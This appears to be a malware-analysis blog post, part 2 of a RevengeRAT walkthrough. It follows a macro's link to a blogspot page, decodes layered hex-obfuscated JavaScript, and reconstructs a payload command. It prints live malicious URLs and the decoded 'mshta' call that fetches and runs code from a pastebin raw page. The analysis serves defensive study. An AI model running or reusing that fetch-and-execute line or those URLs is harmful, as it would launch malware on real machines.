# RevengeRAT (Part 2) – Pastebin, Javascript, and StrReverse(StrReverse(“stuff”))

Continuing our walk-through, we now get outside of the document itself and see what happens next.

Part 1: Getting through the macros.

Part 2: Analysis of javascript from blogspot site to the first pastebin page.

Part 3: Analysis of javascript on remaining pastebin pages.

We left off with the macro running this command:

This means we must know what happens next. Using whatever site/mechanism you use to expand shortened links, you will see that the URL takes you to a blogspot site of all things.

https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html

Having seen this sort of behavior before, I’m not going to actually visit the site. Remember, our goal is to learn what is happening purposefully, rather than learning what is happening accidentally. In this case, I’m pretty sure that the site contains a monstrous chunk of javascript that I don’t want running. This means I’m going to use powershell to download the website. From there I can investigate it at my leisure.

PS C:\path\to\wherever> Invoke-WebRequest -Uri "https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html" -OutFile "C:\Path\to\wherever\site.html"

Full disclosure, I can neither write nor read html. However, I have learned that huge chunks of javascript like this are suspicious and deserve more attention.

I found CyberChef to be extremely handy when working with this. We can copy out the hex in the javascript command and make use of the “From Hex” recipe.

Looking at the output below, we can see more javascript? Yes, we will find that we have multiple layers of obfuscated javascript. This means we need to take the hex from the output, copy it to the input, and lather, rinse, and repeat until we get something useful like this:

Lines 8-9 contain the last two rounds of obfuscated javascript. Lines 10-20 contain what is actually going to run. Looking carefully at line 11 we see the infamous double StrReverse.

(sigh)

Anyway, line 15 (var Zwk) is where the string gets put together. Line 18 (var AS_ww) contains the completed string and is where it is executed. After a little bit of analysis you can see this command being run:

12. AS_ww1 = http://www.pastebin.com/raw/
13. AS_ww0 = mshta
14. AS_ww2 = qykTeRnR
17. AS_ww = http://www.pastebin.com/raw/qykTeRnR